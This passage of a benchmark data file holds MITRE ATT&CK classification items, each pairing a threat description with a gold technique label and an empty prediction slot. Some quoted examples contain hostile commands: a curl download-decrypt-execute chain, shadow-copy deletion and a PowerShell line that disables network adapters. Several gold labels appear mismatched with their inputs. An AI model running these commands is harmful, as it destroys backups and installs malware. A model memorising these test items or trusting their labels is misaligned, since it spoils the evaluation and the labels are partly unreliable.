Collected Data - Archive via Library", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FrameworkPOS can collect elements related to credit card data from process memory.\n\t - T1005: Data from Local System\n- Text: RainyDay can download files to a compromised host.\n\t - T1105: Ingress Tool Transfer\n- Text: BITSAdmin can be used to create BITS Jobs to upload and/or download files from SMB file servers.\n\t - T1570: Lateral Tool Transfer\n", + "input": "POWERSTATS can upload files from compromised hosts.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Olympic Destroyer uses API calls to enumerate the infected system's ARP table.\n\t - T1016: System Network Configuration Discovery\n- Text: On the other hand, FIN7 takes advantage of Mshta, a utility that can execute VBScript, and scheduled tasks to run malicious code on user systems.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1053: Scheduled Task/Job\n\t - T1218.005: System Binary Proxy Execution - Mshta\n- Text: No matching sample found for T1546.005\n", + "input": "BabyShark has executed the \"ipconfig /all\" command.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Night Dragon has used HTTP for C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: During CostaRicto, the threat actors set up remote SSH tunneling into the victim's environment from a malicious domain.\n\t - T1572: Protocol Tunneling\n- Text: Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic, creating port-protocol mismatches.\n\t - T1571: Non-Standard Port\n", + "input": "Epic uses HTTP and HTTPS for C2 communications.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Some versions of CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. If it detects that it is, it will exit.\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: The campaigns maintain persistence on machines by creating two daily scheduled task entries.\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: IcedID has used obfuscated VBA string expressions.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "Amadey does not run any tasks or install additional malware if the victim machine is based in Russia.", + "gold": "- T1614: System Location Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cuba can discover shared resources using the \"NetShareEnum\" API call.\n\t - T1135: Network Share Discovery\n- Text: The threat actor\u2019s main objective for using this RAT (known as Razy/NeD worm/Wonder Botnet) was obvious from the victim data that was collected \u2013 it was to search for specific file extensions such as PDF, DOC, DOCX, XLS, and XLSX, where they are compressed in RAR files per category, stored in temp directories within a folder named by victim ID (bot ID \u2013 long MD5 string), encrypted and uploaded to the C2\n\t - T1005: Data from Local System\n\t - T1083: File and Directory Discovery\n\t - T1074: Data Staged\n- Text: can enumerate drives and Remote Desktop sessions.\n\t - T1049: System Network Connections Discovery\n", + "input": "ShimRat can enumerate connected drives for infected host machines.", + "gold": "- T1135: Network Share Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Caterpillar WebShell can gather the IP address from the victim's machine using the IP config command.\n\t - T1016: System Network Configuration Discovery\n- Text: No matching sample found for T1602.001\n- Text: No matching sample found for T1602.002\n", + "input": "The reconnaissance modules used with Duqu can collect information on network configuration.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has leveraged a zero-day vulnerability to escalate privileges.\n\t - T1068: Exploitation for Privilege Escalation\n- Text: BlackEnergy has enabled the \"TESTSIGNING\" boot configuration option to facilitate loading of a driver component.\n\t - T1553.006: Subvert Trust Controls - Code Signing Policy Modification\n- Text: To install Weave Scope on the server the attackers use an exposed Docker API port and create a new privileged container with a clean Ubuntu image. The container is configured to mount the file system of the container to the filesystem of the victim server, thus gaining the attackers access to all files on the server. The initial command given to the container is to download and execute several cryptominers\n\t - T1611: Escape to Host\n", + "input": "Remsec has a plugin to drop and execute vulnerable Outpost Sandbox or avast! Virtualization drivers in order to gain kernel mode privileges.", + "gold": "- T1068: Exploitation for Privilege Escalation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cuba has executed hidden PowerShell windows.\n\t - T1564.003: Hide Artifacts - Hidden Window\n- Text: The following commands are available: Command SubCommand Description VER Generates the following IRC client command that will be sent to the C2 server: PRIVMSG : 8 LED= 20160124 KILL Trojan disconnects from the IRC server and terminates itself RESET Trojan disconnects from the IRC server and runs the executable again OS Obtains the Windows version and responds to the C2 with the following message \u201cPRIVMSG :\u201d: Windows NT Windows 95 Windows 98 Windows ME Windows 2003 Windows XP Windows 7 Windows Vista Unkown os info !SH EXEC Not supported MD Creates a specified directory\n\t - T1106: Native API\n\t - T1010: Application Window Discovery\n- Text: No matching sample found for T1218.014\n", + "input": "Meteor can hide its console window upon execution to decrease its visibility to a victim.", + "gold": "- T1564.003: Hide Artifacts - Hidden Window", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Crimson contains a command to collect and exfiltrate emails from Outlook.\n\t - T1114.001: Email Collection - Local Email Collection\n- Text: UNC2452 staged data and files in password-protected archives on a victim's OWA server.\n\t - T1074.002: Data Staged - Remote Data Staging\n- Text: Our analysis shows that the Crimson RAT malware is compiled as a .NET binary with minimal obfuscation. This could indicate that the cybercriminal group behind this campaign is possibly not well-funded.\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1001: Data Obfuscation\n\t - T1588.001: Obtain Capabilities - Malware\n\t - T1587.001: Develop Capabilities - Malware\n", + "input": "During Night Dragon, threat actors used RAT malware to exfiltrate email archives.", + "gold": "- T1114.001: Email Collection - Local Email Collection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the credential vault and DPAPI.\n\t - T1555: Credentials from Password Stores\n- Text: MuddyWater has performed credential dumping with LaZagne.\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n- Text: LaZagne can perform credential dumping from MSCache to obtain account and password information.\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n", + "input": "MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email.", + "gold": "- T1555: Credentials from Password Stores", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Chaes has used an unsigned, crafted DLL module named \"hha.dll\" that was designed to look like a legitimate 32-bit Windows DLL.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive: YYYY-MM-DD hh:mm:ss quser YYYY-MM-DD hh:mm:ss C:\\windows\\temp\\svchost.exe a -m5 -v2000m -hp{password} -inul -r \"{destination_file.rar}\" \"{multiple user directories linked to the victim's projects}\" -x*.exe -x*.msi -x*.cab -x*.inc -x*.dll -x*.db -x*.mdb -x*.htm -x*.html -x*.css -x*.jar -x*.js -x*.tmp -x*.bak -x*.dat -x*.log -x*.xml -x*.dmp -x*.dbf -x*.avi -x*.mp3 -x*.mp4 -x*.mpg -x*.mpeg -x*.asp -x*.aspx -x*.gif -x*.jpg -x*.mpp -x*.pst The threat actors typically rename the encrypted RAR archives\n\t - T1036: Masquerading\n- Text: For Operation Spalax, the threat actors registered hundreds of domains using Duck DNS and DNS Exit.\n\t - T1583.001: Acquire Infrastructure - Domains\n", + "input": "Transparent Tribe can mimic legitimate Windows directories by using the same icons and names.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has cleared logs during post compromise cleanup activities.\n\t - T1070: Indicator Removal\n- Text: is capable of deleting files on the victim. It also securely removes itself after collecting and exfiltrating data.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: These anti-forensic recovery commands are quite interesting and appear to make use of an undocumented feature of the vssadmin resize command. While the first command in Figure 2 above, vssadmin Delete Shadows /all /quiet, is commonly used by ransomware, the command option vssadmin resize shadowstorage is rarely used. In situations where shadow copies were not created by vssadmin, but by third-party applications (such as backup software), vssadmin can display an error and not delete the backups. Try removing them with the backup application which created them. The vssadmin resize shadowstorage command is a \u201chack\u201d that relies on vssadmin to delete storage when the shadow copies are resized. It forces the shadow copies to be deleted regardless of their context. The command works by resizing the default shadow volume size from 10 percent to 401 MB (the minimum size is 300 MB). Then the shadow storage is set to unbounded, which allows it to use all available disk space. The shadow copies are then deleted by calling the command vssadmin Delete Shadows /all /quiet a second time\n\t - T1490: Inhibit System Recovery\n", + "input": "FIVEHANDS can use WMI to delete files on a target machine.", + "gold": "- T1047: Windows Management Instrumentation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JScript, which allows the cybercriminals to understand the context of the infected workstation. This module mainly relies on WMI and Windows objects to deliver results, which will be sent back to the operators\n\t - T1124: System Time Discovery\n\t - T1082: System Information Discovery\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n- Text: If the user account doesn\u2019t have local administrative or domain administrative permissions, the adversary attempts to discover which local or domain admin accounts exist, and exfiltrates the admin\u2019s usernames. To identify if privileged users are active on remote servers, the adversary makes use of PsLogList from Microsoft Sysinternals to retrieve the Security event logs. The built-in Windows quser-command to show logged on users is also heavily used by them. If such a privileged user was recently active on a server the adversary executes Cobalt Strike\u2019s built-in Mimikatz to dump its password hashes\n\t - T1087.002: Account Discovery - Domain Account\n- Text: Pony has used the \"NetUserEnum\" function to enumerate local accounts.\n\t - T1087.001: Account Discovery - Local Account\n", + "input": "POWRUNER may collect domain group information by running \"net group /domain\" or a series of other commands on a victim.", + "gold": "- T1069.002: Permission Groups Discovery - Domain Groups", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bumblebee has been spread through e-mail campaigns with malicious links.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: BLINDINGCAN has been delivered by phishing emails containing malicious Microsoft Office documents.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: 1) Hunting for PDF files that are created with the same \u201cDocumentID\u201d management metadata field result in a set of files that have been used in email delivery against banking entities. 2) All of the PDF files embed a link based on a Google redirect, leading to the download of a Microsoft Office document file. 3) The Microsoft Office document files contain macros for code execution. Those macros match the characteristics of the builder that we have characterized\n\t - T1204.002: User Execution - Malicious File\n\t - T1204.001: User Execution - Malicious Link\n", + "input": "SpicyOmelette has been distributed via emails containing a malicious link that appears to be a PDF document.", + "gold": "- T1566.002: Phishing - Spearphishing Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Attor's dispatcher can modify the Run registry key.\n\t - T1112: Modify Registry\n- Text: Waterbear can hook the \"ZwOpenProcess\" and \"GetExtendedTcpTable\" APIs called by the process of a security product to hide PIDs and TCP records from detection.\n\t - T1562.006: Impair Defenses - Indicator Blocking\n- Text: Ragnar Locker has used VirtualBox and a stripped Windows XP virtual machine to run itself. The use of a shared folder specified in the configuration enables Ragnar Locker to encrypt files on the host operating system, including files on any mapped drives.\n\t - T1564.006: Hide Artifacts - Run Virtual Instance\n", + "input": "ShadowPad maintains a configuration block and virtual file system in the Registry.", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 1) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. In the case of file 8892279f3. the remote location is http://185.203.119[.]184/Dropbox/request. and only continues if the file exists. 2) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. The content of both files is shown in the appendix section of this report. and only continues if the file exists\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n- Text: Dragonfly 2.0 modified the Registry to hide create user accounts.\n\t - T1564.002: Hide Artifacts - Hidden Users\n- Text: Execute Pluginhost.exe, the plugin management component. Save the payloads as Alternate Data Streams and set scheduled tasks to run them\n\t - T1564.004: Hide Artifacts - NTFS File Attributes\n", + "input": "APT28 has saved files with hidden file attributes.", + "gold": "- T1564.001: Hide Artifacts - Hidden Files and Directories", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: The malicious library completes malware installation. Specifically, it creates a registry value responsible for automatically running RMS at system startup. Notably, in most cases of this campaign the registry value is placed in the RunOnce key, instead of the Run key, enabling the malware to run automatically only the next time the system starts up. After that, the malware needs to create the registry value again.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: A file stealer can run a TaskScheduler DLL to add persistence.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", + "input": "RogueRobin created a shortcut in the Windows startup folder to launch a PowerShell script each time the user logs in to establish persistence.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Siloscape impersonates the main thread of \"CExecSvc.exe\" by calling \"NtImpersonateThread\".\n\t - T1134.001: Access Token Manipulation - Token Impersonation/Theft\n- Text: Many ZeroT samples can perform UAC bypass by using eventvwr.exe to execute a malicious file.\n\t - T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control\n- Text: APT28 exploited a Windows SMB Remote Code Execution Vulnerability to conduct lateral movement.\n\t - T1210: Exploitation of Remote Services\n", + "input": "A Patchwork payload uses process hollowing to hide the UAC bypass vulnerability exploitation inside svchost.exe.", + "gold": "- T1055.012: Process Injection - Process Hollowing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The ROKRAT samples used during the two \"Evil New Year\" and the \"North Korean Human Rights\" campaigns contained a reconnaissance phase. The malware uses the following registry key to get the machine type: HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData. The \"System manufacturer\" value is used to identify the type of machine. The source code only considers the following machine types\n\t - T1012: Query Registry\n- Text: Carbanak has copied legitimate service names to use for malicious services.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: CSPY Downloader can write to the Registry under the \"%windir%\" variable to execute tasks.\n\t - T1112: Modify Registry\n", + "input": "QUADAGENT checks if a value exists within a Registry key in the HKCU hive whose name is the same as the scheduled task it has created.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: They use At.exe to schedule tasks to run self-extracting RAR archives, which install either HttpBrowser or PlugX\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: SUNSPOT was identified on disk with a filename of taskhostsvc.exe (SHA256 Hash: c45c9bda8db1d470f1fd0dcc346dc449839eb5ce9a948c70369230af0b3ef168), and internally named taskhostw.exe by its developers. It was likely built on 2020-02-20 11:40:02, according to the build timestamp found in the binary, which is consistent with the currently assessed StellarParticle supply chain attack timeline. StellarParticle operators maintained the persistence of SUNSPOT by creating a scheduled task set to execute when the host boots\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: ZIRCONIUM has created a run key named \"Dropbox Update Setup\" to mask a persistence mechanism for a malicious binary.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", + "input": "StrifeWater has create a scheduled task named `Mozilla\\Firefox Default Browser Agent 409046Z0FF4A39CB` for persistence.", + "gold": "- T1053: Scheduled Task/Job", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Whitefly has obtained and used tools such as Mimikatz.\n\t - T1588.002: Obtain Capabilities - Tool\n- Text: The attackers are using a tool with name plainpwd in order to dump Windows credentials from memory. This tool is a slightly modified version of the open-source project mimikatz\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: Mustang Panda has used vssadmin to create a volume shadow copy and retrieve the NTDS.dit file. Mustang Panda has also used \"reg save\" on the SYSTEM file Registry location to help extract the NTDS.dit file.\n\t - T1003.003: OS Credential Dumping - NTDS\n", + "input": "Thrip has obtained and used tools such as Mimikatz and PsExec.", + "gold": "- T1588.002: Obtain Capabilities - Tool", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: runs tests to determine the privilege level of the compromised user.\n\t - T1033: System Owner/User Discovery\n- Text: Another component of the KGH suite is the m.dll module, which is an information stealer that harvest data from browsers, Windows Credential Manager, WINSCP and mail clients\n\t - T1114.001: Email Collection - Local Email Collection\n- Text: This is a classic RAT that can download, upload, execute commands on the victim host and, finally, perform keylogging\n\t - T1056: Input Capture\n\t - T1105: Ingress Tool Transfer\n", + "input": "MuddyWater has used malware that can collect the victim\u2019s username.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Executive summary . The PROMETHIUM threat actor \u2014 active since 2012 \u2014 has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. PROMETHIUM has been resilient over the years. We have no evidence that the websites of the real applications were compromised to host the malicious installer. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. If it is executed with the \"help\" parameter, it will install a service to execute itself as a service. This has a notable side effect: if rmaserv.exe is executed isolated on a sandbox (so without the parameter), the service is not created. Document search module: Mssqldbserv.xml . This module has been described before in the article here. The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. SFT file creation routine Using the working directory as a base path, which in this sample case is C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\4CA-B25C11-A27BC\\, each selected file will be compressed into the file kr.zp\n\t - T1204.002: User Execution - Malicious File\n- Text: This activity has TTP and targeting overlap with previous activity, suspected to be APT29. The 2018 and 2016 LNK files are similar in structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK was created\n\t - T1204.001: User Execution - Malicious Link\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Meteor can disconnect all network adapters on a compromised host using `powershell -Command \"Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($.NetEnabled) { $.Disable() } }\" > NUL`.\n\t - T1489: Service Stop\n", + "input": "Indrik Spider has attempted to get users to click on a malicious zipped file.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: No matching sample found for T1548.001\n- Text: Keydnap puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program.\n\t - T1036.006: Masquerading - Space after Filename\n- Text: The app executes the following shell command to download a custom-compiled version of the EggShell server for macOS: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py The first part of the command downloads an encoded file from a Github page belonging to a user named youarenick\" and saves that file to a hidden file named .info.enc in /private/tmp/. Next, it uses openssl to decode that file into a hidden Python file named .info.py. Finally, it executes the resulting Python script.\"\n\t - T1553.001: Subvert Trust Controls - Gatekeeper Bypass\n", + "input": "Keydnap adds the setuid flag to a binary so 